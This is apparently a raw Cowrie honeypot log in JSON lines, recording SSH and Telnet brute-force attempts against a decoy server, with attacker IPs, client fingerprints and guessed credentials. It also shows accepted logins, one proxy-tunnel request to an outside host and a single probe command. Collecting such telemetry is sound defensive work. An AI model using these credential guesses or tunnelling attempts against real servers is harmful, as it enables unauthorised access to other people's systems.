{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:33:00.313869Z","src_ip":"45.88.8.215","session":"5e26ef1f2904"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":52652,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb49a461eb00","protocol":"ssh","message":"New connection: 196.251.86.249:52652 (1.2.3.4:22) [session: cb49a461eb00]","sensor":"my-vps","timestamp":"2025-08-26T09:33:18.038457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:33:18.565195Z","src_ip":"196.251.86.249","session":"cb49a461eb00"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:33:18.566508Z","src_ip":"196.251.86.249","session":"cb49a461eb00"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T09:33:21.222356Z","src_ip":"196.251.86.249","session":"cb49a461eb00"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:33:22.903159Z","src_ip":"196.251.86.249","session":"cb49a461eb00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27124,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c60b765ed34","protocol":"ssh","message":"New connection: 212.227.235.229:27124 (1.2.3.4:22) [session: 3c60b765ed34]","sensor":"my-vps","timestamp":"2025-08-26T09:33:49.910823Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:33:49.911909Z","src_ip":"212.227.235.229","session":"3c60b765ed34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27508,"dst_ip":"1.2.3.4","dst_port":22,"session":"13b3de52280c","protocol":"ssh","message":"New connection: 212.227.235.229:27508 (1.2.3.4:22) [session: 13b3de52280c]","sensor":"my-vps","timestamp":"2025-08-26T09:33:50.063547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:33:50.064482Z","src_ip":"212.227.235.229","session":"13b3de52280c"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T09:33:50.220597Z","src_ip":"212.227.235.229","session":"13b3de52280c"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:33:50.691256Z","src_ip":"212.227.235.229","session":"13b3de52280c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T09:33:50.848378Z","session":"13b3de52280c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":54752,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ce713c2ab4d","protocol":"ssh","message":"New connection: 196.251.86.249:54752 (1.2.3.4:22) [session: 2ce713c2ab4d]","sensor":"my-vps","timestamp":"2025-08-26T09:34:19.491158Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55928,"dst_ip":"1.2.3.4","dst_port":22,"session":"a15fb43ffdce","protocol":"ssh","message":"New connection: 217.72.205.35:55928 (1.2.3.4:22) [session: a15fb43ffdce]","sensor":"my-vps","timestamp":"2025-08-26T09:34:19.530938Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:34:19.532088Z","src_ip":"217.72.205.35","session":"a15fb43ffdce"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:34:20.220327Z","src_ip":"196.251.86.249","session":"2ce713c2ab4d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:34:20.222488Z","src_ip":"196.251.86.249","session":"2ce713c2ab4d"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"654321","message":"login attempt [postgres/654321] failed","sensor":"my-vps","timestamp":"2025-08-26T09:34:22.423303Z","src_ip":"196.251.86.249","session":"2ce713c2ab4d"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:34:23.928647Z","src_ip":"196.251.86.249","session":"2ce713c2ab4d"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":56260,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffac19b2b3f8","protocol":"ssh","message":"New connection: 45.88.8.186:56260 (1.2.3.4:22) [session: ffac19b2b3f8]","sensor":"my-vps","timestamp":"2025-08-26T09:34:25.665880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:34:26.225543Z","src_ip":"45.88.8.186","session":"ffac19b2b3f8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T09:34:26.226458Z","src_ip":"45.88.8.186","session":"ffac19b2b3f8"}
{"eventid":"cowrie.login.success","username":"root","password":"Pass123!","message":"login attempt [root/Pass123!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:34:29.475733Z","src_ip":"45.88.8.186","session":"ffac19b2b3f8"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:34:30.441429Z","src_ip":"45.88.8.186","session":"ffac19b2b3f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":11594,"dst_ip":"1.2.3.4","dst_port":23,"session":"b07094f580fa","protocol":"telnet","message":"New connection: 212.227.125.160:11594 (1.2.3.4:23) [session: b07094f580fa]","sensor":"my-vps","timestamp":"2025-08-26T09:34:41.471501Z"}
{"eventid":"cowrie.session.closed","duration":12.817282915115356,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:34:54.288715Z","src_ip":"212.227.125.160","session":"b07094f580fa"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:35:00.064275Z","src_ip":"212.227.235.229","session":"13b3de52280c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":56068,"dst_ip":"1.2.3.4","dst_port":22,"session":"4aa2d8002141","protocol":"ssh","message":"New connection: 196.251.86.249:56068 (1.2.3.4:22) [session: 4aa2d8002141]","sensor":"my-vps","timestamp":"2025-08-26T09:35:21.633727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:35:22.220663Z","src_ip":"196.251.86.249","session":"4aa2d8002141"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:35:22.221447Z","src_ip":"196.251.86.249","session":"4aa2d8002141"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-08-26T09:35:24.015253Z","src_ip":"196.251.86.249","session":"4aa2d8002141"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:35:25.674259Z","src_ip":"196.251.86.249","session":"4aa2d8002141"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44748,"dst_ip":"1.2.3.4","dst_port":23,"session":"d14abed378a7","protocol":"telnet","message":"New connection: 212.227.125.160:44748 (1.2.3.4:23) [session: d14abed378a7]","sensor":"my-vps","timestamp":"2025-08-26T09:36:17.694520Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:36:17.779021Z","src_ip":"212.227.125.160","session":"d14abed378a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:36:17.827787Z","src_ip":"212.227.125.160","session":"d14abed378a7"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":57740,"dst_ip":"1.2.3.4","dst_port":22,"session":"9547f5ddb726","protocol":"ssh","message":"New connection: 196.251.86.249:57740 (1.2.3.4:22) [session: 9547f5ddb726]","sensor":"my-vps","timestamp":"2025-08-26T09:36:23.021866Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:36:23.665958Z","src_ip":"196.251.86.249","session":"9547f5ddb726"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:36:23.666722Z","src_ip":"196.251.86.249","session":"9547f5ddb726"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"321","message":"login attempt [postgres/321] failed","sensor":"my-vps","timestamp":"2025-08-26T09:36:26.397577Z","src_ip":"196.251.86.249","session":"9547f5ddb726"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:36:28.122872Z","src_ip":"196.251.86.249","session":"9547f5ddb726"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49658,"dst_ip":"1.2.3.4","dst_port":23,"session":"d0e665fcc665","protocol":"telnet","message":"New connection: 212.227.235.229:49658 (1.2.3.4:23) [session: d0e665fcc665]","sensor":"my-vps","timestamp":"2025-08-26T09:37:08.334076Z"}
{"eventid":"cowrie.session.closed","duration":1.6379125118255615,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:37:09.971918Z","src_ip":"212.227.235.229","session":"d0e665fcc665"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49660,"dst_ip":"1.2.3.4","dst_port":23,"session":"22f178e06e39","protocol":"telnet","message":"New connection: 212.227.235.229:49660 (1.2.3.4:23) [session: 22f178e06e39]","sensor":"my-vps","timestamp":"2025-08-26T09:37:10.197007Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:37:10.745505Z","src_ip":"212.227.235.229","session":"22f178e06e39"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:37:10.762929Z","src_ip":"212.227.235.229","session":"22f178e06e39"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T09:37:12.451300Z","src_ip":"212.227.235.229","session":"22f178e06e39"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"3.0","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:37:13.735502Z","src_ip":"212.227.235.229","session":"22f178e06e39"}
{"eventid":"cowrie.session.closed","duration":3.542189836502075,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:37:13.739122Z","src_ip":"212.227.235.229","session":"22f178e06e39"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":59708,"dst_ip":"1.2.3.4","dst_port":22,"session":"c99e82235bdf","protocol":"ssh","message":"New connection: 196.251.86.249:59708 (1.2.3.4:22) [session: c99e82235bdf]","sensor":"my-vps","timestamp":"2025-08-26T09:37:26.246994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:37:27.671865Z","src_ip":"196.251.86.249","session":"c99e82235bdf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:37:27.672710Z","src_ip":"196.251.86.249","session":"c99e82235bdf"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"test","message":"login attempt [postgres/test] failed","sensor":"my-vps","timestamp":"2025-08-26T09:37:28.984383Z","src_ip":"196.251.86.249","session":"c99e82235bdf"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:37:30.586536Z","src_ip":"196.251.86.249","session":"c99e82235bdf"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":57118,"dst_ip":"1.2.3.4","dst_port":22,"session":"c90ba03abaac","protocol":"ssh","message":"New connection: 93.123.109.189:57118 (1.2.3.4:22) [session: c90ba03abaac]","sensor":"my-vps","timestamp":"2025-08-26T09:38:01.732314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:38:01.733080Z","src_ip":"93.123.109.189","session":"c90ba03abaac"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T09:38:01.752664Z","src_ip":"93.123.109.189","session":"c90ba03abaac"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana","message":"login attempt [solana/solana] failed","sensor":"my-vps","timestamp":"2025-08-26T09:38:01.818544Z","src_ip":"93.123.109.189","session":"c90ba03abaac"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:38:02.840190Z","src_ip":"93.123.109.189","session":"c90ba03abaac"}
{"eventid":"cowrie.session.connect","src_ip":"206.189.224.163","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"f49610fd707e","protocol":"ssh","message":"New connection: 206.189.224.163:6103 (1.2.3.4:22) [session: f49610fd707e]","sensor":"my-vps","timestamp":"2025-08-26T09:38:14.886509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T09:38:14.993835Z","src_ip":"206.189.224.163","session":"f49610fd707e"}
